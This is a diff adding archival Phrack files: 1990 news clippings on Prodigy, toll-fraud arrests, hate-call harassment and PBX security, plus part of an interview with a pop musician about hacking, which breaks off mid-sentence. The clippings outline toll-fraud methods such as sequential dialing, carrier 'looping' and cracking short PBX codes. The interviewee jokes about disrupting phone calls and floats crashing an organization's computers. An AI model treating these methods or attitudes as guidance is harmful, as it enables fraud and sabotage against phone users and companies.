+Prodigy plan to begin charging users who send more than 30 e-mail messages a
+month.  Rothman and the others say they sent very polite messages to people
+(Penny Hay of Los Angeles says her messages were even approved by the Prodigy
+legal department) telling them about the new fees and urging them to protest.
+
+What's really happening is that Prodigy is proving its complete arrogance and
+total lack of understanding of the dynamics of on-line communication.  They
+just don't get it.  People are NOT going to spend nearly $130 a year just to
+see the weather in Oregon or order trips to Hawaii.
+
+Even the computerphobes Prodigy wants to attract quickly learn the real value
+of the service is in finding new friends and holding intelligent "discussions"
+with others across the country.
+
+But Prodigy blithely goes on censoring everything meant for public consumption,
+unlike other nationwide services (or even bulletin-board systems run out of
+some teenager's bedroom).  Rothman's story is not the only one about capricious
+or just plain stupid censoring.  Dog fanciers can't use the word ``bitch'' when
+talking about their pets, yet the service recently ran an advice column all
+about oral sex.  One user who complained when a message commenting on the use
+of the term "queen bitch" on "L.A.  Law" was not allowed on was told that
+"queen b***h" would be acceptable, because adults would know what it meant
+but the kiddies would be saved.
+
+So when the supposed technology illiterates Prodigy thinks make up its user
+base managed to get around this through the creation of private mail "lists"
+(and, in fact, many did so at the urging of Prodigy itself!), Prodigy started
+complaining of "e-mail hogs," quietly announced plans to levy charges for more
+than a minute number of e-mail messages each month and finally, simply canceled
+the accounts of those who protested the loudest!
+
+And now we are watching history in the making, with the nation's first
+nationwide protest movement organized almost entirely by electronic mail (now
+don't tell Prodigy this, but all those people they kicked off quickly got back
+onto the system -- Prodogy allows up to six users per household account, and
+friends simply loaned their empty slots to the protest leaders).
+
+It's truly amazing how little faith Prodigy has in the ability of users to
+behave themselves.  Other systems have "sysops" to keep things in line, but
+rarely do they have to pull messages.  Plus, Prodigy is just being plain dumb.
+Rothman now has a mailing list of about 1,500.  That means every time he sends
+out one of his newsletters on collectibles, he sends 1,500 e-mail messages,
+which, yes, costs more for Prodigy to send over long-distance lines and store
+in its central computers.  But if they realized their users are generally
+mature, rather than treating them as 4-year-olds, Rothman could post just one
+message in a public area, that everybody could see.
+
+Is this any way to run an on-line system?  Does Prodigy really want to drive
+away the people most inclined to use the service -- and see all those ads that
+pop up at the bottom of the screen?  Prodigy may soon have to do some
+accounting to the folks at IBM and Sears, who by most accounts have already
+poured at least $750 million into "this thing."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - -
+With your computer and modem, you can reach Fred the Middlesex News
+Computer anytime, day or night, at (508) 872-8461. Set your parameters
+to 8-1-N and up to 2400 baud.
+
+_______________________________________________________________________________
+
+
+HEADLINE  Cops Say Hacker, 17, `Stole' Phone Service
+          Byline:   By Joshua Quittner
+DATE      10/31/90
+SOURCE    Newsday (NDAY)
+          Edition:  NASSAU AND SUFFOLK
+          Section:  NEWS
+          Page:     02
+          (Copyright Newsday Inc., 1990)
+
+State Police arrested a 17-year-old computer hacker at his terminal yesterday
+afternoon, and charged the Bethpage High School student with using his computer
+to run up more than $1 million worth of long-distance telephone calls on credit
+card numbers he deciphered.
+
+State Police Senior Investigator Donald Delaney, who supervised the
+investigation and arrest of John Farrell, of 83 S.  Third St., said that the
+case was among the first to rely on new technology developed by
+telecommunications engineers to track long-distance telephone-service abusers.
+
+Investigators believe that as early as December, 1989, Farrell was using his
+computer and a homemade electronic device, known as a black box, to
+sequentially dial telephone numbers, which double as credit card numbers.  By
+automatically calling the numbers in sequence, Farrell hoped to trigger a
+signal indicating a valid credit card number.
+
+However, AT&T, which recently developed software to detect such sequential
+dialing, alerted Delaney's office in September of Farrell's alleged attempts.
+In July, investigators surreptitiously placed a "pen register" - a device that
+records all numbers dialed from a particular phone line - on Farrell's
+telephone, Delaney said.
+
+State Police and U.S.  Secret Service agents - the federal agency has been
+taking an active part in computer crimes and investigates credit card fraud -
+staked out Farrell's house yesterday afternoon.  Shortly after 3 p.m., when the
+youth arrived home from school, technicians monitoring his telephone line
+signaled the police that he had already turned on his computer and was using an
+illegal credit card number to access an electronic bulletin board in Illinois,
+police said.  Officers, armed with a search warrant, then entered the house and
+arrested Farrell.
+
+Delaney said Farrell found over 100 long-distance credit card numbers, from
+four long-distance carriers, and posted them on rogue electronic bulletins
+boards in Virginia, Chicago, Denmark and France.  Although he allegedly made
+most of the illegal calls, other hackers also used the numbers.  The majority
+of the calls - more than $600,000 worth - were billed to four corporate card
+numbers, said Delaney, who added that the phone company is responsible for such
+losses.  Farrell was arrested and charged with six felonies, including grand
+larceny, computer trespass and criminal possession of stolen property.  The
+charges carry a maximum penalty of four years in prison.  He was released into
+the custody of his parents last night.  Neither Farrell nor his parents could
+be reached for comment yesterday.  Farrell was associated with a group of
+hackers who called themselves Paradox, Delaney said.
+
+_______________________________________________________________________________
+
+
+HEADLINE  Menacing calls started out as prank, says participant
+          Byline:   Katharine Webster and Graciella Sevilla
+          Credit:   Staff Writer
+          Notes:    Editions vary : Head varies
+DATE      10/28/90
+SOURCE    The San Diego Union and Tribune (SDU)
+          Pub:      UNION
+          Edition:  1,2,3,4,5,6
+          Section:  LOCAL
+          Page:     B-1
+          (Copyright 1990)
+
+A three-year campaign of telephoned threats and ethnic slurs directed against
+the Jewish owner of a National City pawn shop started out as a "stupid prank"
+that grew to include more than 100 people, according to one of the young men
+who participated in the harassment.  "Little did I know when I started this
+three years ago, that it would escalate into my brother calling (David Vogel)
+10 times a day," said Gary Richard Danko, 21, of Chula Vista, who cooperated
+with the FBI investigation that resulted in the indictment Wednesday of his
+older brother and two other men on civil rights charges.
+
+Michael Dennis Danko, 23, and Brett Alan Pankauski, 22, both of Chula Vista,
+and Jeffrey Alan Myrick, 21, of Paradise Hills in San Diego, pleaded not guilty
+in U.S.  District Court yesterday to a six-count indictment charging them with
+wire fraud and felony conspiracy to violate the civil rights of David Vogel, a
+66-year-old Jewish immigrant who escaped the Holocaust.
+
+Pankauski was released on $10,000 bail and admonished to avoid all contact with
+Vogel.  But Danko and Myrick were held without bail pending an Oct.  4
+detention hearing after federal prosecutor Michael McAuliffe convinced
+Magistrate Irma Gonzalez that they posed substantial flight risks.
+
+On Wednesday, Gary Danko and a friend, Robert John Byrd, 21, also of Chula
+Vista, pleaded guilty to one misdemeanor count of conspiring to violate Vogel's
+civil rights, according to a spokesman for the U.S.  attorney's office.  The
+two friends, who met while working at a 7-Eleven, were released and agreed to
+testify at the trial of the remaining three defendants.
+
+Though the arrests climaxed a five-month investigation involving the FBI, U.S.
+attorney's office and the Department of Justice, Gary Danko said yesterday that
+the menacing phone calls to numbers picked "at random" from the telephone book
+began years ago.
+
+The group of friends, most of whom have known each other since elementary
+school, all used to make crank phone calls, Danko said, even to each other.
+They also experimented with breaking codes for answering machines and changing
+the outgoing message to something profane.
+
+While he said he stopped making the calls to Vogel a couple of years ago, his
+brother and others "took it out to a degree to torment the guy."
+
+"I feel bad that it turned out this way," Danko said.  "I wish there was some
+way I could make it up to David (Vogel)."
+
+"I know how he feels," Danko added.  "Ever since I've had my own phone line
+I've had harassing phone calls between 2 and 6 in the morning to the point
+where I've changed my phone number three times." Danko denied that he, his
+brother, or any of the other defendants in the case were racists or that they
+had targeted Vogel for any particular reason.  He said that the defendants made
+crank calls to many people, and that the anti-Jewish nature of the calls to
+Vogel was probably based on a "lucky guess" that he was Jewish.
+
+According to the indictment, Michael Danko, Myrick, and Pankauski made phone
+calls in which they referred to Nazi concentration camps and Hitler, while
+threatening to harm Vogel and his pawn-shop business.
+
+Vogel said he began receiving the phone calls -- which included racial slurs
+and taunts about his wife -- in 1987.  Sometimes he received up to 12 calls a
+day, creating a "personal hell." Earlier this year, he finally hired a private
+investigator, who then turned the case over to the FBI.
+
+"It caused suffering for us like the concentration camps did for my family,"
+Vogel said.  "It was horrible."
+
+Another relative of Gary and Michael Danko, who asked not to be identified,
+said he thought the calls to Vogel continued only "because they got a reaction
+out of him -- he screamed and yelled at them." But he said Vogel was probably
+not the only Jew targeted in the phone calls.
+
+The relative agreed with FBI agents, who described these incidents as isolated
+and not connected with organized racist groups such as the Skinheads.
+
+Instead, he said, the brothers thought they were doing "something funny." He
+said he thought they still didn't realize they were doing something wrong, even
+though he had "yelled and screamed at them" to stop.
+
+Gary Danko is a computer "hacker" who works at a computer store, he said.
+Michael Danko was unemployed.
+
+FBI agents began investigating the calls in May, when they placed a tape
+recorder on Vogel's phone.  It only took a few moments before the first hate
+call came in.
+
+Agents traced the calls to a number of phone booths and then began putting
+together the wire-fraud case.
+
+In addition to the civil rights violations, the indictment alleges that the
+three defendants conspired to obtain unauthorized AT&T long-distance access
+codes to make long-distance phone calls without paying for them.
+
+If convicted of the civil rights and wire-fraud charges, the defendants could
+face up to 15 years in prison and $500,000 in fines.  In addition, they face
+various additional charges of illegally obtaining and using the restricted
+long-distance access codes.
+
+Yesterday, Vogel angrily rejected the notion that these callers were less than
+serious in their intentions.
+
+"They're full of baloney.  They don't know what they are talking about," he
+said.
+
+_______________________________________________________________________________
+
+HEADLINE  SHORT-CIRCUITING DATA CRIMINALS
+          STEPS CAN BE TAKEN TO DETECT AND PREVENT COMPUTER SECURITY BREACHES,
+          BUT BUSINESSES HESITATE TO PROSECUTE
+          Byline:   Mary J. Pitzer Daily News Staff Writer
+          Notes:    MONDAY BUSINESS: COVER STORY THE PRICE OF COMPUTER
+          CRIME. Second of two parts
+DATE      10/22/90
+SOURCE    LOS ANGELES DAILY NEWS   (LAD)
+          Edition:  Valley
+          Section:  BUSINESS
+          Page:     B1
+          (Copyright 1990)
+
+Along with other telecommunications companies, Pacific Bell is a favorite
+target for computer crime.
+
+"We're a victim," said Darrell Santos, senior investigator at Pacific Bell.
+"We have people hacking us and trying to get into our billables.  It seems like
+a whole lot of people are trying to get into the telecommunications network."
+
+But the company is fighting back.  About seven employees in its investigative
+unit work with different law enforcement agencies to track down criminals, many
+of whom use the phone lines to commit computer crimes.
+
+In cooperation with authorities Pacific Bell investigators collect evidence,
+trace calls, interview suspects and testify in court.  They even do their own
+hacking to figure out what some of their chief adversaries are up to.
+
+"We take a (telephone) prefix and hack the daylights out of it.  We hack our
+own numbers," Santos said.  "Hey, if we can do it, think of what those brain
+childs are doing."
+
+Few companies are nearly so aggressive.  For the most part computer crime is a
+growing business that remains relatively unchecked.  State and federal laws
+against computer crime are in place, but few cases are prosecuted.  Most
+incidents go unreported, consultants say.
+
+"We advise our clients not to talk about losses and security because just
+talking about them in public is a breach," said Donn Parker, a senior managment
+consultant at SRI International in Palo Alto.  "Mostly companies handle
+incidents privately or swallow the loss."
+
+Most problematic is that few companies have tight enough security to protect
+themselves.
+
+"On a scale of one to 10, the majority of companies are at about a two," said
+Jim Harrigan, senior security consultant at LeeMah Datacom Security Corp.,
+which sells computer security products.
+
+Current laws are strong enough to convict computer criminals, security experts
+say.  But they have been little used and sentences are rarely stiff, especially
+because so many violators are juveniles.
+
+Fewer than 250 computer crime cases have been prosecuted nationally, according
+to Kenneth Rosenblatt, head of the Santa Clara County district attorney's high
+technology unit.  Rosenblatt co-authored California's recent computer crime
+law, which creates new penalties such as confiscation of computer equipment.
+
+Under a strengthened federal Computer Fraud and Abuse Act, Cornell University
+graduate student Robert T.  Morris Jr.  was convicted of unleashing a computer
+virus in Internet, a large computer network tying universities and government
+facilities.  Though the virus was not intended to destroy programs, it infected
+thousands of computers and cost between $100,000 and $10 million to combat,
+according to author and hacking expert Cliff Stoll.
+
+Morris was sentenced to three years probation and a $10,000 fine.
+
+A major problem in policing computer crime is that investigators are
+understaffed and undertrained, Rosenblatt said.  While Los Angeles and other
+police departments have computer crime units, most are not geared for it, he
+said.  And violent crimes take precedence.
+
+Rosenblatt would like to see greater regional cooperation and coordination
+among local law enforcement agencies.
+
+Because investigators are understaffed, they must depend on their victims to
+gather enough evidence to convict the culprits.  And that can be fraught with
+difficulties, Kenneth Weaver, criminal investigator in the San Diego district
+attorney's office, said at a recent security conference in Newport Beach.
+
+In one case a company's computer system crashed and its programs were erased 30
+days after an employee left the firm.  With six months of backup tapes, the
+company was able to document what had happened.  The District Attorney's office
+asked to estimate how much money had been lost.
+
+The total came to $3,850, well below the $5,000 in damages needed for a felony
+case, Weaver said.  And then the information was delayed 14 months.  It needed
+to be reported in 12 months for the D.A.  to go forward with the case.
+
+"We were prevented from prosecuting," Weaver said.  In California, 71 percent
+of the cases result in convictions once arrests are made, according to the
+National Center for Computer Crime Data.
+
+But when prosecutors do make a case, there can be more trouble.  Some prominent
+people in the computer industry have complained that a 2-year investigation by
+the U.S.  Secret Service infringed on civil rights.
+
+The investigation, code-named Operation Sun Devil, was started to snare members
+of the Legion of Doom, an elite hacker group.  The Secret Service suspected
+that they had broken into BellSouth Corp.'s telephone network and planted
+destructive programs that could have knocked out emergency and customer phone
+service across several states.  Last spring, hacker dens in 13 cities were
+raided.  Two suspects have been charged with computer crimes, and more arrests
+are expected.
+
+But a group called EFF, formed in July by Lotus Development Corp.  founder
+Mitchell D.  Kapor and Apple Computer Inc.  co-founder Stephen Wozniak, has
+objected to the crackdown as overzealous.
+
+"The excesses of Operation Sun Devil are only the beginning of what threatens
+to become a long, difficult, and philosophically obscure struggle between
+institutional control and individual liberty," Kapor wrote in a paper with
+computer expert and Grateful Dead lyricist John Perry Barlow.
+
+So far, the foundation has granted $275,000 to Computer Professionals for
+Social Responsibility to expand its ongoing work on civil liberties protections
+for computer users.
+
+The foundation also is offering legal assistance to computer users who may have
+had their rights infringed.  For example, it provided legal support to Craig
+Neidorf, publisher of an online hacking "magazine." Neidorf had been charged
+with felony wire fraud and interstate transportation of stolen property for
+publishing BellSouth network information.
+
+Neidorf said he was not aware the information was stolen.  EFF claimed that
+Neidorf's right to free speech had been violated.  The government dropped its
+case after EFF representatives found that the apparently stolen information was
+publicly available.
+
+Companies that want to prosecute computer crime face other dilemmas.
+
+"The decision to bring in public authorities is not always the best," said
+Susan Nycum, an attorney at Baker & McKenzie in Palo Alto.
+
+In a criminal case, the company loses control over what information is made
+public in the trial.  But companies can pursue civil remedies that enable them
+to keep a lower profile.  Suing for theft of trade secret, for example, would
+be one avenue, Weaver said.
+
+Many companies are reluctant to beef up security even if they know the risks
+from computer crime.  First, they worry that making access to computers more
+difficult would lower productivity.  There also is concern that their technical
+people, who are in high demand, might leave for other jobs if security becomes
+too cumbersome.
+
+Expense is another factor.  Serious security measures at a large installation
+can cost an average of $100,000, though a smaller company can be helped for
+about $10,000, said Trevor Gee, partner at consulting company Deloitte and
+Touche.
+
+"They hear all the rumors, but unless you illustrate very specific savings,
+they are reluctant," Gee said.
+
+Proving cost savings is difficult unless the company already has been hit by
+computer crime.  But those victims, some of whom have suffered losses in the
+millions, are usually security experts' best customers, consultants say.
+
+Much of the vulnerability to computer crime comes simply from lax security.
+Access is not restricted.  Doors are not locked.  Passwords are easily guessed,
+seldom changed and shared with several workers.  And even these basic security
+measures are easy to put off.
+
+"You hear a lot of, `We haven't gotten around to changing the password because.
+.  .," Roy Alzua, telecommunications security program manager at Rockwell
+International, told the security conference.
+
+So what should companies do to plug the gaping security holes in their
+organizations?
+
+Consultants say that top management first has to make a commitment that
+everyone in the operation takes seriously.
+
+"I've seen companies waste several hundreds, if not thousands, of dollars
+because management was not behind the program," Deloitte & Touche's Gee said.
+"As a result, MIS (management information systems) professionals have a tough
+time" pressing for more security.
+
+Once top executives are convinced that there is a need for tighter security,
+they must establish policies and procedures, consultants say.  Gee suggests
+that in addition to training programs, reminders should be posted.  Such issues
+as whether employees are allowed to use computers for personal projects should
+be tackled.
+
+Management also should decide what systems and information need to be secured.
+
+"They need to zero in on the information they are really concerned about," said
+Gregory Therkalsen, national director of information security services for
+consultants Ernst & Young.  "About 95 percent of the information in the average
+company nobody cares about."
+
+Before tackling complicated security systems, companies should pay attention to
+the basics.
+
+"Lock a door.  It's as easy as that," Alzua said.
+
+Companies should make sure that the passwords that come with their computers
+are changed.  And then employees should not use common words or names that are
+easy to guess.  Using a combination of numbers and letters, although difficult
+to remember, is more secure.
+
+Another basic measure is to have a system that automatically checks the
+authorization of someone who dials into the company's computers from the
+outside.
+
+Then, companies should develop an electronic audit trail so that they know who
+is using the system and when.  And companies should always take the time to
+make backups of their computer files and store them in a place safe from fire
+and flood.
+
+A wide variety of software is available to help companies protect themselves.
+Some automatically encode information entered into the system.  Others detect
+viruses.
+
+For a more sophisticated approach, LeeMah Datacom has a system that blocks a
+computer tone from the telephone line until the correct access code is entered.
+The company has held contests challenging hackers to break into its system.  No
+one has, the company said.
+
+SRI is developing a system that would monitor computer activity around the
+clock with the supervision of a security guard.  SRI is implementing the system
+for the FBI and plans to make it a commercial product.
+
+No company would want to have a perfectly secure system, consultants say.  That
+would mean shutting out most employees and staying off networks that can make
+operations more efficient.
+
+While still balancing the need for openess, however, there is much that can be
+done to prevent computer crime.  And although there is no perfect solution,
+companies don't need to stand by waiting to become the next victim.
+
+_______________________________________________________________________________
+
+
+HEADLINE  BELL CANADA'S NEW LOOK TELEPHONE NUMBERS PUZZLE SOME CUSTOMERS
+DATE      09/26/90
+SOURCE    CANADA NEWS-WIRE   (CNW)
+          Contact:  For further information, contact: Irene Colella (416)
+          581-4266; Geoff Matthews, Bell Canada (416) 581-4205. CO: Bell Canada
+          SS: IN: TLS
+          Origin:   TORONTO
+          Language: ENGLISH; E
+          Day of Week: Wed
+          Time:        09:56 (Eastern Time)
+          (Copyright Canada News-Wire)
+RE        CN
+          ---    BELL CANADA'S NEW LOOK TELEPHONE NUMBERS PUZZLE SOME
+                                    CUSTOMERS                            ---
+
+TORONTO - Bell Canada's new look telephone numbers in Southern Ontario are
+causing puzzlement among some customers in the 416 area code.
+
+In late 1988 Bell found itself running short of telephone numbers in the Golden
+Horseshoe because of rapid business and residential growth as well as the
+increasing popularity of cellular telephones, fax machines and new services
+like Ident-A-Call.
+
+To accommodate continuing growth, the company had to come up with a means of
+creating new number combinations.  The solution was found by assigning local
+exchanges made up of combinations which had previously been reserved as area
+codes elsewhere in North America.
+
+Until March of this year the three numbers (known as a central office code)
+which begin a telephone number never had a zero or a one as the second digit.
+Anything from two through nine could appear in that position, but combinations
+with zero or one were used only as area codes.  But with more than four million
+telephone numbers in use throughout the Golden Horseshoe Bell was simply
+running out of the traditional central office code combinations.  By creating
+new central office codes such as 502, 513, 602 and 612, the company has access
+to up to one million new telephone numbers.
+
+Some customers, however, have found the new numbers a little confusing.  When
+the new numbers were introduced last March, Bell mounted an extensive
+advertising campaign telling customers throughout the 416 area code to dial 1
+plus 416 or 0 plus 416 for all long distance calls within the area code in
+order to ensure calls to these numbers could be completed.
+
+Bell spokesman Geoff Matthews says that while the ad campaign was extremely
+effective in changing dialing habits, a number of customers are scratching
+their heads when they first see the new telephone numbers.
+
+``In some cases we are finding that business customers have not programmed
+their telephone equipment to permit dialing the new numbers,'' Matthews said,
+``but some people think it is simply a mistake when they see a telephone number
+beginning with 612 for example.  Most are satisfied once they have received an
+explanation.''
+
+Creating the million new telephone numbers should see Bell Canada through
+several years, Matthews said, after which a new area code will be introduced.
+
+The 416 area code is the first in Canada to reach capacity.  A number of U.S.
+cities have faced a similar situation, Matthews said, and have introduced
+similar number plans.
+
+Bell Canada, the largest Canadian telecommunications operating company, markets
+a full range of state-of-the-art products and services more than seven million
+business and residence customers in Ontario, Quebec and part of the Northwest
+Territories.
+
+Bell Canada is a member of Telecom Canada -- an association of Canada's major
+telecommunications companies.
+
+
+For further information, contact:  Irene Colella (416) 581-4266; Geoff
+Matthews, Bell Canada (416) 581-4205.
+
+_______________________________________________________________________________
+
+
+HEADLINE  Keeping The PBX Secure
+          Byline:   Bruce Caldwell
+DATE      10/15/90
+          Issue:    291
+          Section:  TRENDS
+          Page:     25
+          (Copyright 1990 CMP Publications, Inc.  All rights reserved.)
+
+Preventing toll fraud through the corporate PBX can be as simple, albeit
+inconvenient, as expanding access codes from four digits to 14.  "When we had
+nine-digit codes, we got hurt bad," says Bob Fox of US Sprint Communications
+Co., referring to the phone company's credit card numbers.  "But when we moved
+to 14-digit codes and vigorous prosecution, our abuse dropped off the table."
+
+At most companies, the authorization code for remote access, used by employees
+to place calls through the corporate PBX while away from the office, is only
+four digits.  Many companies are "hung up on the four-digit authorization
+code," says Fox, mainly because it's easier for the executives to remember.
+But all it takes a hacker to crack open a four-digit code is about 20 minutes.
+
+To help their customers cope with PBX abuse, MCI Communications Corp.  has
+prepared a tip sheet describing preventative measures (see accompanying chart).
+PBX fraud may display itself in a particular pattern:  The initial stage will
+show a dramatic increase in 950-outbound and 800-outbound services, which allow
+a surreptitious user to "cover his tracks" by jumping from one carrier to
+another-a technique known as "looping." In time, knowledge of the unsecured
+system may become widespread, resulting in heavy use of services connected with
+normal telecommunications traffic.
+
+Customers are advised to audit systems for unusual usage and to change codes on
+a regular basis.  Steady tones used as prompts to input access codes should be
+avoided, because that is what hacker-programmed computers look for.  Instead,
+MCI advises use of a voice recording or no prompt at all, and recommends
+automatic termination of a call or routing it to a switchboard operator
+whenever an invalid code is entered.
+
+An obvious source of help is often overlooked.  Explains Jim Snyder, an
+attorney in MCI's office of corporate systems integrity, "The first thing we
+tell customers is to contact their PBX vendor to find out what kind of
+safeguards can be built into the PBX."
+
+_______________________________________________________________________________
+
+
+HEADLINE  WATCH YOUR PBX
+          Column:   Database
+DATE      04/02/90
+SOURCE    COMMUNICATIONSWEEK   (CWK)
+          Issue:    294
+          Section:  PRN
+          Page:     24
+          (Copyright 1990 CMP Publications, Inc.  All rights reserved.)
+
+Many managers of voice systems would be "horrified" if they realized the low
+levels of security found in their PBXs, according to Gail Thackeray, an
+assistant attorney general for the state of Arizona.  Thackeray made her
+comments to a group of financial users at a computer virus clinic held by the
+Data Processing Management Association's Financial Industries chapter.
+Thackeray, who investigates computer crimes, said that PBXs often are used by
+network criminals to make free long distance phone calls at the expense of the
+companies that own the PBXs.  "PBX owners are often unaware that if $500,000
+worth of fraud comes from your PBX, the local carrier is not going to absorb
+that loss," she said.
+
+The PBX also is often the first source of break-in by computer hackers, who use
+the free phone service to get into a user's data system, she said.  "PBXs are
+the prime method for international toll fraud and hackers attacking and hiding
+behind your corporate identity," Thackeray said.
+
+Richard Lefkon, Citicorp's network planner and president of DPMA's financial
+industries chapter, said users are more likely to take steps toward protecting
+a PBX than a network of microcomputers.  "A PBX is expensive, so if you add 15
+to 20 percent to protect it, it's a justifiable expenditure," Lefkon said.  "If
+you have a PC which costs a couple of thousand dollars, unless you think you're
+special, you are going to think twice before investing several hundred dollars
+per PC to protect them."
+
+_______________________________________________________________________________
diff --git a/phrack32/12.txt b/phrack32/12.txt
new file mode 100644
index 0000000..0fcf54d
--- /dev/null
+++ b/phrack32/12.txt
@@ -0,0 +1,356 @@
+                        KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
+
+                              K N I G H T L I N E
+
+                           Issue 03/Part III of III
+
+                            17th of November, 1990
+
+                              Written, compiled,
+
+                           and edited by Doc Holiday
+
+                        KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
+
+                                      ---
+
+     What is this?  Information Society's new album is called "HACK"?  Just
+what do these guys know about hacking?  How did they come up with the album
+title?  Why are they taking such an interest in the Computer Underground?
+
+     Knightline got the chance to ask Kurt Valaquen of InSoc about the new
+album and his involvement with the CU.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+RINGing New York .. .
+
+KV: Hello
+Me: Kurt?
+KV: Yes, Doc ?
+Me: Yea, you ready for the interview?
+KV: Sure, shoot.
+Me: Okay, this is DH with Phrack Classic--
+TC: This is the Conflict
+PH: And this is Pain Hertz
+KV: I uh, hope you ask me what my hacker handle is..
+Me: Ok, what's your handle?
+KV: Because I believe that I have one of the coolest hacker's handles that I've
+    ever heard.
+TC: uhh
+Me: What is it?
+KV: TRAPPED VECTOR.
+Me: "Trapped Vector" ?
+KV: yep
+Me: How did you come up with that?
+KV: What? You don't recognize it ?
+Me: haha
+KV: What.. . and you guys call yourselves hackers?
+Me: ah
+KV: My god. . you guys must be so young that you've never had to deal with
+    assembly language.
+Me: Who would want to-- It was a sarcastic question..
+Me: Now, Kurt..
+KV: Trapped Vector is a term from deep deep down in the functioning's of a CPU.
+Me: Right.
+Me: Uh, uh What kind of involvement, if any, have you had in the
+    telecommunications field?
+KV: In telecommunications what?
+Me: In the telecommunications field.
+KV: Uhh.. I majored in computer science at the University of Minnesota.. . Just
+    long enough to get interested and not long enough to get a degree.
+Me: ah. So you didn't graduate?
+KV: No. After my 5th year I finally gave up and went to Vienna.
+Me: Uhh. Let's get into the new album .. uh now, what was the inspiration for
+    involving the "hacking" theme in your new album?
+KV: Umm, well, it's not like we were inspired to do it -- and we sat around all
+    day and said "Hey, let's like put this hacker's moltese into it." -- it's
+    more like we just left all that stuff out on our first album because we
+    were trying to .. uh.. to not make any waves, since it was our first album.
+    And now were cocky and think we can do whatever we want.  So we just did
+    whatever we wanted. And whenever we do whatever we want, some of that
+    stuff inevitably creeps in because .. were into it.
+Me: uhh.. have you been following all of the recent hacking busts that have
+    plagued the country this year .. ?
+KV: Hacking "buzz" that has plaged.. .
+Me: BUSTS.. yea hacking busts..
+KV: Oh, I haven't been following it, but I've been hearing a little bit about
+    it from my friends..
+Me: Yea, because your album comming out titled "HACK" really does tie in
+    with this time period of hackers getting alot of press..
+KV: Yea
+Me: And I just thought that could have been one of the inspirations.. .
+KV: Well, actually, believe it or not, we don't really know what it means to
+    title an album "HACK".  We have a list of about nine different
+    interpretations that we thought we could leave open and anyone else could
+    decide which is the real one and strangley (Gruhm) the computer hacker
+    concept is pretty far down on our list.  The first one we always think of
+    is uh.. the hack versus .. uh.. respected professional-- meaning-- like,
+    you know, their just hack, he's just a hack writer.. .
+Me: Right.
+KV: Their just hack musicians-- because uh, I guess we wanted to be
+    self-deprecating in a sarcastic and easily marketable way.
+Me: Yea..
+Me: What about your personal involvement in the Computer Underground? Is there
+    one? With hackers?
+KV: Well, umm.. if I were not being a "pop tart" (which is our personal lingo
+    for rock star) I would probably be trying to make my money off of
+    programming.
+Me: Aaah!
+KV: Ummm, however.. that's not the case.. I am trying to be a "pop tart" so my
+    involvement is more limited that I would like it to be.  I mean I do all my
+    work on IBM.. When I'm composing..
+Me: Hm, Kurt, what are your thoughts and attitudes toward hackers and hacking?
+KV: Umm,  this is my thoughts and attitudes towards it:  I am somebody who --
+    always. . always -- like when I had that telephone job, I just was, I
+    hardly did any work.  I just spent the whole time trying to come up with
+    tricky things to do you know.  Like I'd screw up other people's phone calls
+    and stuff and so like I'm way into it.  And I understand why people want to
+    do it.  BUT, I always kinda, knew that I just .. . shouldn't.  Just because
+    it's stupid.. It was childish.  And, I just wish that hackers could come up
+    with something better to do than get things without paying for them.
+PH: Like something more productive?
+KV: Yea, like .. uh.. umm, crash some sort of umm, killing organization's
+    computer system.
+Me: Have you always had these thoughts or..just because of your popularity?
+KV: Umm, I've had this attitude as I got older, because .. um, I'm just
+    becomming really bored with people devoting all this intelligence and
+    motivation into like avoiding paying their phone bill.
+TC: Well, actually, that's getting away from the hacker as such. Because alot
+    of hackers are really into systems more than their into .. you know, toll
+    fraud.
+KV: Well I sure hope so..
+TC: Yea, I mean..
+KV: My Idea of great hacking is gathering information that other people are
+    wronmgfully trying to withhold.
+TC: Right.
+KV: But, most hacking to me seems to be petty ways of getting things without
+    paying for them.. and that is just silly.
+Me: That is the "90's hackers" Kurt.
+PH: Yea, it's moving that way alot..
+Me: It's in that direction.
+Me: Tell us about the telephone job you mentioned?
+KV: Well, I worked at a market research place.  You all know what that is-- you
+    call up and say, "Hello, my name is Kurt and Im calling for marketing
+    incentives incorporated, and we are conducting a survey in your area
+    tonight... about toothpaste!"
+PH: Hah
+TC: ahha
+Me: Bahaha
+KV: "And I would like to know if I could ask you a few questions?" .. "What! I
+    don't wanna buy no toothpaste!" .. "No we were just going to ask a few
+    questions.." -- Ewwwwph..
+KV: Like... you would try to come up with ways to not make the phone calls
+    because it was so painful to do.
+TC: heh
+KV: The best thing was when I umm. . this was a time when I didn't know much
+    about telephones.. or how they really worked.. umm. . but I managed to run
+    a little thing-- wires with alligator clips --uhh, from the phone that I
+    was at to the central switcher.  And uhh, whenever I like got up to goto
+    the bathroom, or something, I'd go in there, and by connecting and shorting
+    the two wires out I'd break up someone's phone call.
+PH: ha
+KV: You know, but after a while, I thought to myself, WHY? I wish I could have
+    pulled something more creative like umm.. . installing a uhh.. a pitch
+    transposer on the outgoing signals, so that the people on the other end of
+    the phone would hear, "AND NOW, I WOULD LIKE TO ASK YOU: HOW DO YOU FEEL
+    ABOUT COLEGATE?"
+Me: Bahaha
+TC: ahha
+PH: heh!
+KV: That would have been funny-- aha.
+KV: But, I never did that..
+Me: Hmm, Do you know any other bands that are involved or interested in the
+    computer underground?
+KV: No, I don't know that there are any-- most uh musicians are either
+    anti-tech or if they are into tech they arnt into it enough-- or they arn't
+    into it for it's own sake.  Like, like hackers.
+Me: Did you guys have any problems with the title of your new album?
+KV: Like what do you mean?
+Me: Well, do you find that most of your fans think you guys are into the
+    "hacking scene" because of the title?
+KV: They can think of it anyway they want-- it a bunch of different meanings.
+KV: Like uh, one member of the band thinks of it refering to him being a cook
+    and he likes to cut up meat.
+Me: Hah
+TC: heh
+TC: What about like on the 12" with the "BlueBox 2600" mix and the
+    "Phone Phreakers" mix?
+KV: What about it?
+TC: Yea.. uh
+KV: And the Virtual Reality mix?
+TC: Yea, has that uh.. have you heard anything about that?
+KV: Umm, no people in large just don't notice.  I mean when your a hacker, I
+    mean you kind of forget how little people know.  But it's unbelieveable how
+    much people don't know.  And I'm sure one person in a thousand thinks that
+    those are anything other than, "Oh another wacky mix name!"
+Me: Baha
+KV: Most mix names are just inside jokes-- so most people don't bother trying
+    to understand them.
+TC: Right.
+KV: Umm, basically the only thing that has happened is that people have umm..
+    really responded to the concept of uhh.. us trying to tie into computer
+    hacking-- way more than we were really trying to.  We just wanted it to be
